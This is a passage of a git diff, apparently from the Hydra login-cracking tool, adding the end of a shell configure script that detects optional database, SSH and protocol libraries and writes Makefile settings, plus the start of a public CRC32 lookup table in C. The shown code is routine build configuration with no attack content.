"X$POSTGRES_IPATH" ]; then + if [ -f "$i/libpq-fe.h" ]; then + POSTGRES_IPATH="$i" + fi + if [ -f "$i/pgsql/libpq-fe.h" ]; then + POSTGRES_IPATH="$i/pgsql" + fi + if [ -f "$i/postgresql/libpq-fe.h" ]; then + POSTGRES_IPATH="$i/postgresql" + fi + fi + done + + if [ -n "$POSTGRES_PATH" -a -n "$POSTGRES_IPATH" ]; then + echo " ... found" + fi + if [ "X" = "X$POSTGRES_PATH" -o "X" = "X$POSTGRES_IPATH" ]; then + echo " ... NOT found, module postgres disabled" + POSTGRES_PATH="" + POSTGRES_IPATH="" + fi +#fi + +echo "Checking for SVN (libsvn_client-1 libapr-1.so libaprutil-1.so) ..." +for i in $LIBDIRS ; do + if [ "X" = "X$SVN_PATH" ]; then + if [ -f "$i/libsvn_client-1.so" ]&&[ -f "$i/libapr-1.so" ]&&[ -f "$i/libaprutil-1.so" ]; then + SVN_PATH="$i" + APR_PATH="$i" + fi + fi + if [ "X" = "X$SVN_PATH" ]; then + if [ -f "$i/libsvn_client-1.dylib" ]&&[ -f "$i/libapr-1.dylib" ]&&[ -f "$i/libaprutil-1.dylib" ]; then + SVN_PATH="$i" + APR_PATH="$i" + fi + fi + if [ "X" = "X$SVN_PATH" ]; then + if [ -f "$i/libsvn_client-1.a" ]&&[ -f "$i/libapr-1.a" ]&&[ -f "$i/libaprutil-1.a" ]; then + SVN_PATH="$i" + APR_PATH="$i" + fi + fi + if [ "X" = "X$SVN_PATH" ]; then + TMP_LIB1=`/bin/ls $i/libsvn_client*.so* 2> /dev/null | grep libsvn_client.` + TMP_LIB2=`/bin/ls $i/libapr-1*.so* 2> /dev/null | grep libsvn_client.` + TMP_LIB3=`/bin/ls $i/libaprutil-1*.so* 2> /dev/null | grep libsvn_client.` + if [ -n "$TMP_LIB1" -a -n "$TMP_LIB2" -a -n "$TMP_LIB3" ]; then + SVN_PATH="$i" + APR_PATH="$i" + fi + fi + if [ "X" = "X$SVN_PATH" ]; then + TMP_LIB1=`/bin/ls $i/libsvn_client*.dll* 2> /dev/null | grep libsvn_client.` + TMP_LIB2=`/bin/ls $i/libapr-1*.dll* 2> /dev/null | grep libsvn_client.` + TMP_LIB3=`/bin/ls $i/libaprutil-1*.dll* 2> /dev/null | grep libsvn_client.` + if [ -n "$TMP_LIB1" -a -n "$TMP_LIB2" -a -n "$TMP_LIB3" ]; then + SVN_PATH="$i" + APR_PATH="$i" + fi + fi +done +for i in $INCDIRS ; do + if [ "X" = "X$SVN_IPATH" ]; then + if [ -d "$i/subversion-1" ]; then + SVN_IPATH="$i/subversion-1" + fi + if [ -d "$i/svn" ]; then + SVN_IPATH="$i/svn" + fi + fi + if [ "X" = "X$APR_IPATH" ]; then + if [ -d "$i/apr-1.0" ]; then + APR_IPATH="$i/apr-1.0" + fi + if [ -d "$i/apr-1" ]; then + APR_IPATH="$i/apr-1" + fi + if [ -d "$i/apr" ]; then + APR_IPATH="$i/apr" + fi + fi +done + +if [ "X" = "X$SVN_PATH" -o "X" = "X$SVN_IPATH" -o "X" = "X$APR_IPATH" ]; then + SVN_PATH="" + SVN_IPATH="" + APR_IPATH="" +fi +if [ "$SVN_IPATH" = "/usr/include" ]; then + SVN_IPATH="" +fi +if [ "$APR_IPATH" = "/usr/include" ]; then + APR_IPATH="" +fi + +if [ -n "$SVN_PATH" -a -n "$APR_PATH" ]; then + echo " ... found" +fi +if [ "X" = "X$SVN_PATH" -o "X" = "X$APR_PATH" ]; then + echo " ... NOT found, module svn disabled" +fi + +echo "Checking for firebird (libfbclient.so) ..." +for i in $LIBDIRS ; do + if [ "X" = "X$FIREBIRD_PATH" ]; then + if [ -f "$i/libfbclient.so" -o -f "$i/libfbclient.dylib" -o -f "$i/libfbclient.a" ]; then + FIREBIRD_PATH="$i" + fi + fi + if [ "X" = "X$FIREBIRD_PATH" ]; then + TMP_LIB=`/bin/ls $i/libfbclient.so.* 2> /dev/null | grep libfbclient.` + if [ -n "$TMP_LIB" ]; then + FIREBIRD_PATH="$i" + fi + fi + if [ "X" = "X$FIREBIRD_PATH" ]; then + TMP_LIB=`/bin/ls $i/libfbclient.dll* 2> /dev/null | grep libfbclient.` + if [ -n "$TMP_LIB" ]; then + FIREBIRD_PATH="$i" + fi + fi +done +for i in $INCDIRS ; do + if [ "X" != "X$FIREBIRD_PATH" ]; then + if [ -f "$i/ibase.h" ]; then + FIREBIRD_IPATH="$i" + fi + fi +done +if [ -n "$FIREBIRD_PATH" -a -n "$FIREBIRD_IPATH" ]; then + echo " ... found" +fi +if [ "X" = "X$FIREBIRD_PATH" -o "X" = "X$FIREBIRD_IPATH" ]; then + echo " ... NOT found, module firebird disabled" + FIREBIRD_PATH="" + FIREBIRD_IPATH="" +fi + +echo "Checking for MYSQL client (libmysqlclient.so, math.h) ..." +for i in $LIBDIRS ; do + if [ "X" = "X$MYSQL_PATH" ]; then + if [ -f "$i/libmysqlclient.so" -o -f "$i/libmysqlclient.dylib" -o -f "$i/libmysqlclient.a" ]; then + MYSQL_PATH="$i" + fi + fi + if [ "X" = "X$MYSQL_PATH" ]; then + TMP_LIB=`/bin/ls $i/libmysqlclient.so.* 2> /dev/null | grep libmysqlclient.` + if [ -n "$TMP_LIB" ]; then + MYSQL_PATH="$i" + fi + fi + if [ "X" = "X$MYSQL_PATH" ]; then + TMP_LIB=`/bin/ls $i/libmysqlclient.dll* 2> /dev/null | grep libmysqlclient.` + if [ -n "$TMP_LIB" ]; then + MYSQL_PATH="$i" + fi + fi +done +for i in $INCDIRS ; do + if [ "X" != "X$MYSQL_PATH" ]; then + if [ -f "$i/mysql/mysql.h" ]; then + MYSQL_IPATH="$i/mysql" + fi + fi +done +MATH="" +if [ -f "/usr/include/math.h" ]; then + MATH="-DHAVE_MATH_H" + if [ -n "$MYSQL_PATH" -a -n "$MYSQL_IPATH" -a -n "$MATH" ]; then + echo " ... found" + else + echo " ... NOT found, module Mysql will not support version > 4.x" + MYSQL_PATH="" + MYSQL_IPATH="" + fi +else + echo " ... math.h not found, module Mysql disabled" +fi +echo "Checking for AFP (libafpclient.so) ..." +for i in $LIBDIRS ; do + if [ "X" = "X$AFP_PATH" ]; then + if [ -f "$i/libafpclient.so" -o -f "$i/libafpclient.so" -o -f "$i/libafpclient.a" ]; then + AFP_PATH="$i" + fi + fi + if [ "X" = "X$AFP_PATH" ]; then + TMP_LIB=`/bin/ls $i/libafpclient.so.* 2> /dev/null | grep libafpclient.` + if [ -n "$TMP_LIB" ]; then + AFP_PATH="$i" + fi + fi + if [ "X" = "X$AFP_PATH" ]; then + TMP_LIB=`/bin/ls $i/libafpclient.dll* 2> /dev/null | grep libafpclient.` + if [ -n "$TMP_LIB" ]; then + AFP_PATH="$i" + fi + fi +done +for i in $INCDIRS ; do + if [ "X" != "X$AFP_PATH" ]; then + if [ -f "$i/afpfs-ng/afp.h" ]; then + AFP_IPATH="$i/afpfs-ng" + fi + fi +done +if [ -n "$AFP_PATH" -a -n "$AFP_IPATH" ]; then + echo " ... found" +fi +if [ "X" = "X$AFP_PATH" -o "X" = "X$AFP_IPATH" ]; then + echo " ... NOT found, module Apple Filing Protocol disabled - Apple sucks anyway" + AFP_PATH="" + AFP_IPATH="" +fi + +echo "Checking for NCP (libncp.so / nwcalls.h) ..." +for i in $LIBDIRS ; do + if [ "X" = "X$NCP_PATH" ]; then + if [ -f "$i/libncp.so" -o -f "$i/libncp.dylib" -o -f "$i/libncp.a" ]; then + NCP_PATH="$i" + fi + fi + if [ "X" = "X$NCP_PATH" ]; then + TMP_LIB=`/bin/ls $i/libncp.so.* 2> /dev/null | grep ncp.` + if [ -n "$TMP_LIB" ]; then + NCP_PATH="$i" + fi + fi + if [ "X" = "X$NCP_PATH" ]; then + TMP_LIB=`/bin/ls $i/libncp.dll* 2> /dev/null | grep ncp.` + if [ -n "$TMP_LIB" ]; then + NCP_PATH="$i" + fi + fi +done +for i in $INCDIRS ; do + if [ "X" != "X$NCP_PATH" ]; then + if [ -f "$i/ncp/nwcalls.h" ]; then + NCP_IPATH="$i" + fi + fi +done +if [ -n "$NCP_PATH" -a -n "$NCP_IPATH" ]; then + echo " ... found" +fi +if [ "X" = "X$NCP_PATH" -o "X" = "X$NCP_IPATH" ]; then + echo " ... NOT found, module NCP disabled" + NCP_PATH="" + NCP_IPATH="" +fi + +echo "Checking for SAP/R3 (librfc/saprfc.h) ..." +for i in $LIBDIRS ; do + if [ "X" = "X$SAPR3_PATH" ]; then + if [ -f "$i/librfc.a" -o -f "$i/librfc.dylib" -o "$i/librfc32.dll" ]; then + SAPR3_PATH="$i" + fi + fi + if [ "X" = "X$SAPR3_PATH" ]; then + TMP_LIB=`/bin/ls $i/librfc.* $i/librfc32.* 2> /dev/null | grep librfc` + if [ -n "$TMP_LIB" ]; then + SAPR3_PATH="$i" + fi + fi +done +for i in $INCDIRS ; do + if [ "X" = "X$SAPR3_IPATH" ]; then + if [ -f "$i/saprfc.h" ]; then + SAPR3_IPATH="$i" + fi + fi +done +if [ "X" = "X$SAPR3_PATH" ]; then + SAPR3_IPATH="" +fi +if [ "X" = "X$SAPR3_IPATH" ]; then + SAPR3_PATH="" +fi +if [ -n "$SAPR3_PATH" ]; then + echo " ... found" +fi +if [ "X" = "X$SAPR3_PATH" ]; then + echo " ... NOT found, module sapr3 disabled" + echo "Get it from http://www.sap.com/solutions/netweaver/linux/eval/index.asp" +fi +if [ "$SAPR3_IPATH" = "/usr/include" ]; then + SAPR3_IPATH="" +fi + +echo "Checking for libssh (libssh/libssh.h) ..." +for i in $LIBDIRS ; do + if [ "X" = "X$SSH_PATH" ]; then + if [ -f "$i/libssh.so" -o -f "$i/libssh.dylib" -o -f "$i/libssh.a" ]; then + SSH_PATH="$i" + fi + fi + if [ "X" = "X$SSH_PATH" ]; then + TMP_LIB=`/bin/ls $i/libssh.so* 2> /dev/null | grep libssh.` + if [ -n "$TMP_LIB" ]; then + SSH_PATH="$i" + fi + fi + if [ "X" = "X$SSH_PATH" ]; then + TMP_LIB=`/bin/ls $i/libssh.dll* 2> /dev/null | grep libssh.` + if [ -n "$TMP_LIB" ]; then + SSH_PATH="$i" + fi + fi +done +for i in $INCDIRS ; do + if [ "X" = "X$SSH_IPATH" ]; then + if [ -f "$i/libssh/libssh.h" ]; then + SSH_IPATH="$i" + fi + fi +done +if [ "X" = "X$SSH_PATH" ]; then + SSH_IPATH="" +fi +if [ "X" = "X$SSH_IPATH" ]; then + SSH_PATH="" +fi +if [ -n "$SSH_PATH" ]; then + echo " ... found" +fi +if [ "X" = "X$SSH_PATH" ]; then + echo " ... NOT found, module ssh disabled" + echo 'Get it from http://www.libssh.org' +fi +if [ "$SSH_IPATH" = "/usr/include" ]; then + SSH_IPATH="" +fi + +if [ '!' "X" = "X$*" ]; then + while [ $# -gt 0 ] ; do + if [ "X" = "X$PREFIX" ]; then + PREFIX_TMP=`echo "$1"|sed 's/.*--prefix=//'` + if [ "$PREFIX_TMP" != "$1" ]; then + PREFIX=$PREFIX_TMP + fi + fi + if [ "X" = "X$NOSTRIP" ]; then + NOSTRIP_TMP=`echo "$1"|sed 's/.*--nostrip//'` + if [ -z "$NOSTRIP_TMP" ]; then + NOSTRIP="yes" + fi + fi + if [ "X" = "X$XHYDRA_SUPPORT" ]; then + XHYDRA_SUPPORT_TMP=`echo "$1"|sed 's/.*--disable-xhydra//'` + if [ -z "$XHYDRA_SUPPORT_TMP" ]; then + XHYDRA_SUPPORT="disable" + fi + fi + if [ "X" = "X$WORACLE_PATH" ]; then + WORACLE_PATH_TMP=`echo "$1"|sed 's/.*--with-oracle=//'` + if [ "$WORACLE_PATH_TMP" != "$1" ]; then + WORACLE_PATH="$WORACLE_PATH_TMP" + fi + fi + if [ "X" = "X$WORACLE_LIB_PATH" ]; then + WORACLE_LIB_PATH_TMP=`echo "$1"|sed 's/.*--with-oracle-lib=//'` + if [ "$WORACLE_LIB_PATH_TMP" != "$1" ]; then + WORACLE_LIB_PATH="$WORACLE_LIB_PATH_TMP" + fi + fi + shift + done +fi + + +echo "Checking for Oracle (libocci.so libclntsh.so / oci.h and libaio.so) ..." +#assume if we find oci.h other headers should also be in that dir +#for libs we will test the 2 +if [ "X" != "X$WORACLE_PATH" ]; then + INCDIRS="$INCDIRS $WORACLE_PATH" +fi +if [ "X" != "X$WORACLE_LIB_PATH" ]; then + LIBDIRS="$LIBDIRS $WORACLE_LIB_PATH" +fi + +for i in $LIBDIRS ; do + if [ "X" = "X$ORACLE_PATH" ]; then + if [ -f "$i/libocci.so" ]&&[ -f "$i/libclntsh.so" ]; then + ORACLE_PATH="$i" + fi + fi + if [ "X" = "X$ORACLE_PATH" ]; then + if [ -f "$i/libocci.dylib" ]&&[ -f "$i/libclntsh.dylib" ]; then + ORACLE_PATH="$i" + fi + fi + if [ "X" = "X$ORACLE_PATH" ]; then + if [ -f "$i/libocci.a" ]&&[ -f "$i/libclntsh.a" ]; then + ORACLE_PATH="$i" + fi + fi + if [ "X" = "X$ORACLE_PATH" ]; then + TMP_LIB=`/bin/ls $i/libocci.so.* 2> /dev/null | grep occi.` + if [ -n "$TMP_LIB" ]; then + ORACLE_PATH="$i" + fi + if [ "X" != "X$ORACLE_PATH" ]; then + TMP_LIB=`/bin/ls $i/libclntsh.so.* 2> /dev/null | grep clntsh.` + if [ -z "$TMP_LIB" ]; then + ORACLE_PATH="" + fi + fi + fi + if [ "X" = "X$ORACLE_PATH" ]; then + TMP_LIB=`/bin/ls $i/libocci.dll* 2> /dev/null | grep occi.` + if [ -n "$TMP_LIB" ]; then + ORACLE_PATH="$i" + fi + if [ "X" != "X$ORACLE_PATH" ]; then + TMP_LIB=`/bin/ls $i/libclntsh.dll* 2> /dev/null | grep clntsh.` + if [ -z "$TMP_LIB" ]; then + ORACLE_PATH="" + fi + fi + fi +done +#check for Kernel Asynchronous I/O (AIO) lib support +if [ "X" != "X$ORACLE_PATH" ]; then + LIBAIO="" + for i in $LIBDIRS ; do + if [ "X" = "X$LIBAIO" ]; then + if [ -f "$i/libaio.so" -o -f "$i/libaio.dylib" -o -f "$i/libaio.a" ]; then + LIBAIO="$i" + fi + fi + if [ "X" = "X$LIBAIO" ]; then + TMP_LIB=`/bin/ls $i/libaio.so.* 2> /dev/null | grep aio.` + if [ -n "$TMP_LIB" ]; then + LIBAIO="$i" + fi + TMP_LIB=`/bin/ls $i/libaio.dll* 2> /dev/null | grep aio.` + if [ -n "$TMP_LIB" ]; then + LIBAIO="$i" + fi + fi + done + if [ "X" = "X$LIBAIO" ]; then + ORACLE_PATH="" + fi +fi + +for i in $INCDIRS ; do + if [ "X" != "X$ORACLE_PATH" ]; then + if [ -f "$i/oci.h" ]; then + ORACLE_IPATH="$i" + fi + fi +done +if [ -n "$ORACLE_PATH" -a -n "$ORACLE_IPATH" ]; then + echo " ... found" +fi +if [ "X" = "X$ORACLE_PATH" -o "X" = "X$ORACLE_IPATH" ]; then + echo " ... NOT found, module Oracle disabled" + echo "Get basic and sdk package from http://www.oracle.com/technetwork/database/features/instant-client/index.html" + ORACLE_PATH="" + ORACLE_IPATH="" +fi + + +if [ "X" = "X$XHYDRA_SUPPORT" ]; then + echo "Checking for GUI req's (pkg-config, gtk+-2.0) ..." + XHYDRA_SUPPORT=`pkg-config --help > /dev/null 2>&1 || echo disabled` + if [ "X" = "X$XHYDRA_SUPPORT" ]; then + XHYDRA_SUPPORT=`pkg-config --modversion gtk+-2.0 2> /dev/null` + else + XHYDRA_SUPPORT="" + fi + if [ "X" = "X$XHYDRA_SUPPORT" ]; then + echo " ... NOT found, optional anyway" + else + echo " ... found" + fi +fi + +if [ "$SYSS" = "SunOS" ]; then + echo "Checking for Solaris libraries ..." + for i in $LIBDIRS ; do + if [ "X" = "X$NSL_PATH" ]; then + if [ -f "$i/libnsl.so" ]; then + NSL_PATH="$i" + fi + fi + if [ "X" = "X$SOCKET_PATH" ]; then + if [ -f "$i/libsocket.so" ]; then + SOCKET_PATH="$i" + fi + fi + if [ "X" = "X$RESOLV_PATH" ]; then + if [ -f "$i/libresolv.so" ]; then + RESOLV_PATH="$i" + fi + fi + done + if [ "X" = "X$NSL_PATH" ]; then + echo "NSL library not found, which is needed on Solaris." + fi + if [ "X" = "X$SOCKET_PATH" ]; then + echo "Socket library not found, which is needed on Solaris." + fi + if [ "X" = "X$RESOLV_PATH" ]; then + echo "Resolv library not found, which is needed on Solaris." + fi + if [ -n "$RESOLV_PATH" -a -n "$SOCKET_PATH" -a -n "$RESOLV_PATH" ]; then + echo " ... all found" + fi + echo +fi + +echo "Checking for Android specialities ..." +TMPC=comptest$$ +RINDEX=" not" +echo '#include ' > $TMPC.c +echo '#include ' >> $TMPC.c +echo "int main() { char *x = rindex(\"test\", 'e'); if (x == NULL) return 0; else return 1; }" >> $TMPC.c +gcc -o $TMPC $TMPC.c > /dev/null 2>&1 +test -x $TMPC && RINDEX="" +rm -f $TMPC $TMPC.c +echo " ... rindex()$RINDEX found" +if [ -n "$CRYPTO_PATH" ]; then + RSA=" not" + echo '#include ' > $TMPC.c + echo '#include ' >> $TMPC.c + echo "int main() { RSA *rsa = RSA_generate_key(1024, RSA_F4, NULL, NULL); if (rsa == NULL) return 0; else return 1; }" >> $TMPC.c +#echo "int main() { RSA *rsa; RSA_generate_key_ex(rsa, 1024, 0, NULL); if (rsa == NULL) return 0; else return 1; }" >> $TMPC.c + gcc -o $TMPC $TMPC.c -lssl -lcrypto > /dev/null 2>&1 + test -x $TMPC && RSA="" + rm -f $TMPC $TMPC.c + echo " ... RSA_generate_key()$RSA found" +fi + +echo "Checking for secure compile option support in gcc ..." +GCCSEC="no" +LDSEC="no" +GCCSECOPT="-fstack-protector-all --param ssp-buffer-size=4 -D_FORTIFY_SOURCE=2" +echo '#include ' > $TMPC.c +echo 'int main() { printf(""); return 0; }' >> $TMPC.c +gcc -pie -fPIE $GCCSEPOPT -o $TMPC $TMPC.c > /dev/null 2> $TMPC.c.err +test -x $TMPC && GCCSEC="yes" +grep -q fPI $TMPC.c.err || GCCSECOPT="-pie -fPIE $GCCSECOPT" +rm -f "$TMPC" +gcc $GCCSECOPT -Wl,-z,now -Wl,-z,relro -o $TMPC $TMPC.c > /dev/null 2> $TMPC.c.err +test -x $TMPC && { LDSEC="yes" ; GCCSECOPT="$GCCSECOPT -Wl,-z,now -Wl,-z,relro" ; } +rm -f $TMPC $TMPC.c $TMPC.c.err +echo " Compiling... $GCCSEC" +echo " Linking... $LDSEC" + +echo +XDEFINES="" +XLIBS="" +XLIBPATHS="" +XIPATHS="" + +if [ -n "$FIREBIRD_PATH" -o -n "$PCRE_PATH" -o -n "$IDN_PATH" -o -n "$SSL_PATH" -o -n "$CRYPTO_PATH" -o -n "$NSL_PATH" -o -n "$SOCKET_PATH" -o -n "$RESOLV_PATH" -o -n "$SAPR3_PATH" -o -n "$SSH_PATH" -o -n "$POSTGRES_PATH" -o -n "$SVN_PATH" -o -n "$NCP_PATH" -o -n "$CURSES_PATH" -o -n "$ORACLE_PATH" -o -n "$AFP_PATH" -o -n "$MYSQL_PATH" ]; then + XLIBPATHS="-L/usr/lib -L/usr/local/lib -L/lib" +fi +if [ -n "$SSL_PATH" ]; then + if [ -n "$SSLNEW" ]; then + XDEFINES="$XDEFINES -DLIBOPENSSL" + fi +fi +if [ -n "$CURSES_PATH" ]; then + XDEFINES="$XDEFINES -DLIBNCURSES" +fi +if [ -n "$SAPR3_PATH" ]; then + XDEFINES="$XDEFINES -DLIBSAPR3" +fi +if [ -n "$FIREBIRD_PATH" ]; then + XDEFINES="$XDEFINES -DLIBFIREBIRD" +fi +if [ -n "$IDN_PATH" ]; then + XDEFINES="$XDEFINES -DLIBIDN -DHAVE_PR29_H" +fi +if [ -n "$PCRE_PATH" ]; then + XDEFINES="$XDEFINES -DHAVE_PCRE" +fi +if [ -n "$MYSQL_PATH" ]; then + XDEFINES="$XDEFINES -DLIBMYSQLCLIENT" +fi +if [ -n "$AFP_PATH" ]; then + XDEFINES="$XDEFINES -DLIBAFP" +fi +if [ -n "$NCP_PATH" ]; then + XDEFINES="$XDEFINES -DLIBNCP" +fi +if [ -n "$ORACLE_PATH" ]; then + XDEFINES="$XDEFINES -DLIBORACLE" +fi +if [ -n "$POSTGRES_PATH" ]; then + XDEFINES="$XDEFINES -DLIBPOSTGRES" +fi +if [ -n "$SVN_PATH" ]; then + XDEFINES="$XDEFINES -DLIBSVN" +fi +if [ -n "$SSH_PATH" ]; then + XDEFINES="$XDEFINES -DLIBSSH" +fi +if [ -n "$RINDEX" ]; then + XDEFINES="$XDEFINES -DNO_RINDEX" +fi +if [ -n "$RSA" ]; then + XDEFINES="$XDEFINES -DNO_RSA_LEGACY" +fi +OLDPATH="" +for i in $SSL_PATH $CRYPTO_PATH $SSH_PATH $NSL_PATH $SOCKET_PATH $RESOLV_PATH $SAPR3_PATH $POSTGRES_PATH $SVN_PATH $NCP_PATH $CURSES_PATH $ORACLE_PATH $AFP_PATH $MYSQL_PATH; do + if [ "$OLDPATH" = "$i" ]; then + OLDPATH="$i" + else + XLIBPATHS="$XLIBPATHS -L$i" + OLDPATH="$i" + fi +done +if [ -n "$SSL_IPATH" ]; then + XIPATHS="-I$SSL_IPATH" +fi +if [ -n "$CURSES_PATH" ]; then + XLIBS="$XLIBS -lcurses" +fi +if [ -n "$SAPR3_IPATH" ]; then + XIPATHS="$XIPATHS -I$SAPR3_IPATH" +fi +if [ -n "$SSH_IPATH" ]; then + XIPATHS="$XIPATHS -I$SSH_IPATH" +fi +if [ -n "$SVN_IPATH" ]; then + XIPATHS="$XIPATHS -I$SVN_IPATH" +fi +if [ -n "$APR_IPATH" ]; then + XIPATHS="$XIPATHS -I$APR_IPATH" +fi +if [ -n "$SVN_IPATH" ]; then + XIPATHS="$XIPATHS -I$SVN_IPATH" +fi +if [ -n "$MYSQL_IPATH" ]; then + XIPATHS="$XIPATHS -I$MYSQL_IPATH" +fi +if [ -n "$AFP_IPATH" ]; then + XIPATHS="$XIPATHS -I$AFP_IPATH" +fi +if [ -n "$ORACLE_IPATH" ]; then + XIPATHS="$XIPATHS -I$ORACLE_IPATH" +fi +if [ -n "$SSL_PATH" ]; then + XLIBS="$XLIBS -lssl" +fi +if [ -n "$NCP_PATH" ]; then + XLIBS="$XLIBS -lncp" +fi +if [ -n "$ORACLE_PATH" ]; then + XLIBS="$XLIBS -locci -lclntsh" +fi +if [ -n "$FIREBIRD_PATH" ]; then + XLIBS="$XLIBS -lfbclient" +fi +if [ -n "$IDN_PATH" ]; then + XLIBS="$XLIBS -lidn" +fi +if [ -n "$PCRE_PATH" ]; then + XLIBS="$XLIBS -lpcre" +fi +if [ -n "$MYSQL_PATH" ]; then + XLIBS="$XLIBS -lmysqlclient" +fi +if [ -n "$AFP_PATH" ]; then + XLIBS="$XLIBS -lafpclient" +fi + +if [ -n "$SAPR3_PATH" ]; then + XLIBS="$XLIBS -lrfc" + if [ "$SYSO" = "Cygwin" ]; then + BLA=TMP + else + XLIBS="$XLIBS -ldl" + fi +fi +if [ -n "$POSTGRES_PATH" ]; then + XLIBS="$XLIBS -lpq" +fi +if [ -n "$SVN_PATH" ]; then + XLIBS="$XLIBS -lsvn_client-1 -lapr-1 -laprutil-1 -lsvn_subr-1" +fi +if [ -n "$SSH_PATH" ]; then + XLIBS="$XLIBS -lssh" +fi +if [ -n "$CRYPTO_PATH" ]; then + XLIBS="$XLIBS -lcrypto" +fi +if [ -n "$NSL_PATH" ]; then + XLIBS="$XLIBS -lnsl" +fi +if [ -n "$SOCKET_PATH" ]; then + XLIBS="$XLIBS -lsocket" +fi +if [ -n "$RESOLV_PATH" ]; then + XLIBS="$XLIBS -lresolv" +fi + +if [ -d /usr/kerberos/include ]; then + XIPATHS="$XIPATHS -I/usr/kerberos/include" +fi + +if [ "X" = "X$PREFIX" ]; then + PREFIX="/usr/local" +fi + +if [ "X" = "X$XHYDRA_SUPPORT" ]; then + XHYDRA_SUPPORT="" +else + XHYDRA_SUPPORT="xhydra" +fi + +echo "Hydra will be installed into .../bin of: $PREFIX" +echo " (change this by running ./configure --prefix=path)" +echo + +echo "Writing Makefile.in ..." +echo "XDEFINES=$XDEFINES $MATH" >> Makefile.in +echo "XLIBS=$XLIBS" >> Makefile.in +echo "XLIBPATHS=$XLIBPATHS" >> Makefile.in +echo "XIPATHS=$XIPATHS" >> Makefile.in +echo "PREFIX=$PREFIX" >> Makefile.in +#if [ $XHYDRA_SUPPORT != "disable" ]; then +echo "XHYDRA_SUPPORT=$XHYDRA_SUPPORT" >> Makefile.in +#fi +echo "STRIP=$STRIP" >> Makefile.in +echo >> Makefile.in +cat Makefile.unix > Makefile +cat Makefile.in >> Makefile +# ignore errors if this uname call fails +### Current Cygwin is up to speed :-) +WINDRES="" +if [ "$SYSO" = "Cygwin" ]; then + echo + echo "Cygwin detected, if compilation fails just update your installation." + echo + WINDRES=`which windres` + test -x "$WINDRES" && { + echo "Windres found, will attach icons to hydra cygwin executables" + echo HYDRA_LOGO=hydra-logo.o >> Makefile + echo PWI_LOGO=pw-inspector-logo.o >> Makefile + windres hydra-logo.rc hydra-logo.o + windres pw-inspector-logo.rc pw-inspector-logo.o + } + test -x "$WINDRES" || { + WINDRES="" + echo Windres NOT found, you will not have pretty icon files in the hydra cygwin executables + echo + } + echo +fi +if [ "x$WINDRES" = "x" ]; then + echo HYDRA_LOGO= >> Makefile + echo PWI_LOGO= >> Makefile +fi +if [ "$GCCSEC" = "yes" ]; then + echo "SEC=$GCCSECOPT" >> Makefile +else + echo "SEC=" >> Makefile +fi +echo >> Makefile +if [ "x$NOSTRIP" = "x" ]; then + cat Makefile.am >> Makefile +else + cat Makefile.am | sed 's/^install:.*/install: all/' >> Makefile +fi +echo "now type \"make\"" diff --git a/crc32.c b/crc32.c new file mode 100644 index 0000000..2dc37cb --- /dev/null +++ b/crc32.c @@ -0,0 +1,103 @@ + +/*- +* COPYRIGHT (C) 1986 Gary S. Brown. You may use this program, or +* code or tables extracted from it, as desired without restriction. +* +* First, the polynomial itself and its table of feedback terms. The +* polynomial is +* X^32+X^26+X^23+X^22+X^16+X^12+X^11+X^10+X^8+X^7+X^5+X^4+X^2+X^1+X^0 +* +* Note that we take it "backwards" and put the highest-order term in +* the lowest-order bit. The X^32 term is "implied"; the LSB is the +* X^31 term, etc. The X^0 term (usually shown as "+1") results in +* the MSB being 1 +* +* Note that the usual hardware shift register implementation, which +* is what we're using (we're merely optimizing it by doing eight-bit +* chunks at a time) shifts bits into the lowest-order term. In our +* implementation, that means shifting towards the right. Why do we +* do it this way? Because the calculated CRC must be transmitted in +* order from highest-order term to lowest-order term. UARTs transmit +* characters in order from LSB to MSB. By storing the CRC this way +* we hand it to the UART in the order low-byte to high-byte; the UART +* sends each low-bit to hight-bit; and the result is transmission bit +* by bit from highest- to lowest-order term without requiring any bit +* shuffling on our part. Reception works similarly +* +* The feedback terms table consists of 256, 32-bit entries. Notes +* +* The table can be generated at runtime if desired; code to do so +* is shown later. It might not be obvious, but the feedback +* terms simply represent the results of eight shift/xor opera +* tions for all combinations of data and CRC register values +* +* The values must be right-shifted by eight bits by the "updcrc +* logic; the shift must be unsigned (bring in zeroes). On some +* hardware you could probably optimize the shift in assembler by +* using byte-swap instructions +* polynomial $edb88320 +* +* +* CRC32 code derived from work by Gary S. Brown. +*/ + +#include + +unsigned int crc32_tab[] = { + 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f, + 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, + 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2, + 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, + 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9, + 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, + 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c, + 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, + 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, + 0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, + 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106, + 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, + 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, + 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, + 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950, + 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, + 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7, + 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, + 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, + 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, + 0x5edef90e, 0x29d9c998, 